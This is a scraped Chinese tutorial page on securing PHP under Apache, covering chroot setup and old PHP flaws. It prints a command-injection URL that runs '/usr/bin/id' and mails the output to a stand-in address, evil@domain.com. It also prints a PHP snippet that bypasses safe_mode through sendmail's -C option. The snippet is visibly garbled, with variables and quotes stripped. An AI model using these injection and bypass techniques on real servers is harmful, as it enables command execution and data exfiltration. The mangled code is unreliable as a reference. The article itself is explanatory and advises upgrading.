All articles| All Pictures| All Softwares| All Video| Go home page| Write articles| Upload pictures

Reading number is top 10 articles
SQL,Server了解你的服务器的状态_[SQL,Server教程]
关于在AJAX中GET回的ResponseText中文乱码的最简解决办法_[AJAX教程]
正确理解C#中的ref关键字_.net资料_编程技术
SQL语言基础(1)_mssql学习_编程技术
如何找出相同月日记录_[SQL Server教程]
用.NET,2.0压缩解压功能处理大型数据
教你轻松给流程增加权限控制程序_.net资料_编程技术
C#中ImageAnimator类功能和方法
PHP实例:PHP上传自动生成缩略图及水印类_[PHP教程]
在vc MFC下制作具有XP风格按钮等控件
Reading number is top 10 pictures
More attractive than sora aoi4
美洲杯宝贝的雨中风情2
再来随便发几张
各种囧况!玩游戏最不喜欢出现的十件事(点评)
美女和狗狗1
The dog buy the ham oneself
Nikon microscopic photography of the first three
mythology hero1
Look for from human art net, is good1
这是男生笨么?
Download software ranking
变速齿轮3.26
C++编程教程第三版
徐若瑄成名作“魔鬼天使”
Tram sex maniac 2 (H) rar bag14
Boxer's Top ten classic battle4
Unix video tutorial6
Love the forty days
XML+Web+Service开发教程
jBuilder2006
Photoshop 8.0图象编辑软件
归海一刀 published in(发表于) 2014/2/10 6:48:38 Edit(编辑)
PHP安全配置之实现安全的两个重点_[PHP教程]

PHP安全配置之实现安全的两个重点_[PHP教程]

PHP安全配置之实现安全的两个重点_[PHP教程]

一、Web服务器安全

  PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:


[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com

  都是针对Win32平台,所以需要在chroot环境下调整好sendmail。

  二、PHP本身问题

  1、远程溢出

  PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高.

  2、远程拒绝服务

  PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。

  3、safe_mode绕过漏洞

  还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:

  执行如下的URL:

http://foo.com/evil.php?bar=;/usr/bin/id mail evil@domain.com

  这将id执行的结果发送给evil@domain.com。

  对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:

  #注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样:


script=/tmp/script123;
cf=/tmp/cf123;
fd = fopen(cf, w);
fwrite(fd, OQ/tmp
Sparse=0
R* . chr(9) . #local @ 1 : 1
Mlocal, P=/bin/sh, A=sh script);
fclose(fd);
fd = fopen(script, w);
fwrite(fd, rm -f script cf; );
fwrite(fd, cmd);
fclose(fd);
mail(nobody, , , , -Ccf);
?>

  还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。





添加到del.icio.us 添加到新浪ViVi 添加到百度搜藏 添加到POCO网摘 添加到天天网摘365Key 添加到和讯网摘 添加到天极网摘 添加到黑米书签 添加到QQ书签 添加到雅虎收藏 添加到奇客发现 diigo it 添加到饭否 添加到飞豆订阅 添加到抓虾收藏 添加到鲜果订阅 digg it 貼到funP 添加到有道阅读 Live Favorites 添加到Newsvine 打印本页 用Email发送本页 在Facebook上分享


Disclaimer Privacy Policy About us Site Map

If you have any requirements, please contact webmaster。(如果有什么要求,请联系站长)
Copyright ©2011-
uuhomepage.com, Inc. All rights reserved.